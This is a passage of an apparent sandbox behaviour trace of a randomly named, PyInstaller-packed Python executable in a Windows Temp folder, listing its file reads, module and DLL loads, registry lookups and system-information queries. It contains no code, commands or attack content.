File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 512, size_out = 96 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 1024, size_out = 1024 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 512, size_out = 408 True 1
Fn
Data
File Add Search Path filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802 True 1
Fn
Module Load module_name = kernel32, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CreateActCtxW, address_out = 0x76955d0f True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = ActivateActCtx, address_out = 0x76955911 True 1
Fn
Module Load module_name = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll, base_address = 0x6a9b0000 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetCurrentActCtx, address_out = 0x7694bf9d True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = ActivateActCtx, address_out = 0x76955911 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = DeactivateActCtx, address_out = 0x76955942 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = AddRefActCtx, address_out = 0x7694bffb True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = ReleaseActCtx, address_out = 0x76957347 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_DontWriteBytecodeFlag, address_out = 0x6ac2f250 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_FileSystemDefaultEncoding, address_out = 0x6abd2c6c True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_FrozenFlag, address_out = 0x6ac2f248 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_IgnoreEnvironmentFlag, address_out = 0x6ac2f234 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_NoSiteFlag, address_out = 0x6ac2f244 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_NoUserSiteDirectory, address_out = 0x6ac2ef68 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_OptimizeFlag, address_out = 0x6ac2ef0c True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_VerboseFlag, address_out = 0x6ac2f230 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_BuildValue, address_out = 0x6aadbdb0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_DecRef, address_out = 0x6aa73470 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_Finalize, address_out = 0x6aaec1d0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_IncRef, address_out = 0x6aa73460 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_Initialize, address_out = 0x6aaec1c0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_SetProgramName, address_out = 0x6aaec4f0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_SetPythonHome, address_out = 0x6aaec520 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyDict_GetItemString, address_out = 0x6aa55330 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyErr_Clear, address_out = 0x6aacd780 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyErr_Occurred, address_out = 0x6aacd330 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyErr_Print, address_out = 0x6aaecfb0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyImport_AddModule, address_out = 0x6aad4770 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyImport_ExecCodeModule, address_out = 0x6aad4850 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyImport_ImportModule, address_out = 0x6aad6550 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyList_Append, address_out = 0x6aa67500 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyList_New, address_out = 0x6aa670e0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyLong_AsLong, address_out = 0x6aa6b5d0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyModule_GetDict, address_out = 0x6aa72f30 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyObject_CallFunction, address_out = 0x6aa3d580 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyObject_SetAttrString, address_out = 0x6aa74630 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyRun_SimpleString, address_out = 0x6aaee9a0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyString_FromString, address_out = 0x6aa7a820 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyString_FromFormat, address_out = 0x6aa7b080 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PySys_AddWarnOption, address_out = 0x6aaf33e0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PySys_SetArgvEx, address_out = 0x6aaf4140 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PySys_GetObject, address_out = 0x6aaf2440 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PySys_SetObject, address_out = 0x6aaf2500 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PySys_SetPath, address_out = 0x6aaf4060 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyEval_EvalCode, address_out = 0x6aabbd80 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyMarshal_ReadObjectFromString, address_out = 0x6aada980 True 1
Fn
Module Get Filename module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, process_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, file_name_orig = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll, size = 256 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, file_name_orig = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 256 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Python\PythonCore\2.7\PythonPath False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Python\PythonCore\2.7\PythonPath False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 2
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 2
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4, size_out = 4 True 4
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 17308, size_out = 17307 True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Python\PythonCore\2.7\Modules\pyimod00_crypto_key False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Python\PythonCore\2.7\Modules\pyimod00_crypto_key False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pyimod00_crypto_key, type = file_attributes False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pyimod00_crypto_key.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pyimod00_crypto_key.py, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pyimod00_crypto_key.pyw, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pyimod00_crypto_key.pyc, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE?4045510, type = file_attributes False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 8304, size_out = 8304 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 5695, size_out = 5695 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 950, size_out = 950 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1405, size_out = 1405 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 5838, size_out = 5838 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1679, size_out = 1679 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1232, size_out = 1232 True 1
Fn
Data
System Get Info type = Operating System True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2980, size_out = 2980 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 7452, size_out = 7452 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2528, size_out = 2528 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2508, size_out = 2508 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2369, size_out = 2369 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2112, size_out = 2112 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 10519, size_out = 10519 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 3084, size_out = 3084 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 6930, size_out = 6930 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_ctypes.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
Module Load module_name = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_ctypes.pyd, base_address = 0x6ee80000 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29~1\_ctypes.pyd, function = init_ctypes, address_out = 0x6ee87900 True 1
Fn
Module Load module_name = kernel32, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetLastError, address_out = 0x7695bf00 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1042, size_out = 1042 True 1
Fn
Data
System Get Info type = Hardware Information True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\eggs, type = file_attributes False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 8711, size_out = 8711 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 3498, size_out = 3498 True 1
Fn
Data
File Get Info filename = C:\Windows\system32\uuid, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\system32\uuid.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\uuid, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\uuid.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\System32\Wbem\uuid, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\System32\Wbem\uuid.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\System32\WindowsPowerShell\v1.0\uuid, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\System32\WindowsPowerShell\v1.0\uuid.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\rpcrt4, type = file_attributes False 1
Fn
Module Load module_name = rpcrt4, base_address = 0x75680000 True 1
Fn
Module Get Address module_name = c:\windows\system32\rpcrt4.dll, function = UuidCreate, address_out = 0x756a6483 True 1
Fn
Module Get Address module_name = c:\windows\system32\rpcrt4.dll, function = UuidCreateSequential, address_out = 0x7569b8b0 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 7006, size_out = 7006 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_socket.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
Module Load module_name = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_socket.pyd, base_address = 0x6e720000 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29~1\_socket.pyd, function = init_socket, address_out = 0x6e725790 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1810, size_out = 1810 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_ssl.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
Module Load module_name = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_ssl.pyd, base_address = 0x6b350000 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29~1\_ssl.pyd, function = init_ssl, address_out = 0x6b356600 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 6021, size_out = 6021 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 5151, size_out = 5151 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 5480, size_out = 5480 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 8274, size_out = 8274 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2699, size_out = 2699 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 9252, size_out = 9252 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1181, size_out = 1181 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 5906, size_out = 5906 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 14670, size_out = 14670 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 3385, size_out = 3385 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 7428, size_out = 7428 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1693, size_out = 1693 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 10202, size_out = 10202 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1746, size_out = 1746 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 3203, size_out = 3203 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_hashlib.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
Module Load module_name = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_hashlib.pyd, base_address = 0x6a8b0000 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29~1\_hashlib.pyd, function = init_hashlib, address_out = 0x6a8b2200 True 1
Fn
Module Get Handle module_name = c:\windows\system32\advapi32.dll, base_address = 0x769f0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = CryptAcquireContextA, address_out = 0x769f91dd True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = CryptGenRandom, address_out = 0x769fdfc8 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Python\PythonCore\2.7\Modules\fcntl False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Python\PythonCore\2.7\Modules\fcntl False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\fcntl, type = file_attributes False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\fcntl.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\fcntl.py, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\fcntl.pyw, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\fcntl.pyc, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 12277, size_out = 12277 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 12852, size_out = 12852 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4924, size_out = 4924 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 6800, size_out = 6800 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1806, size_out = 1806 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4422, size_out = 4422 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 6260, size_out = 6260 True 1
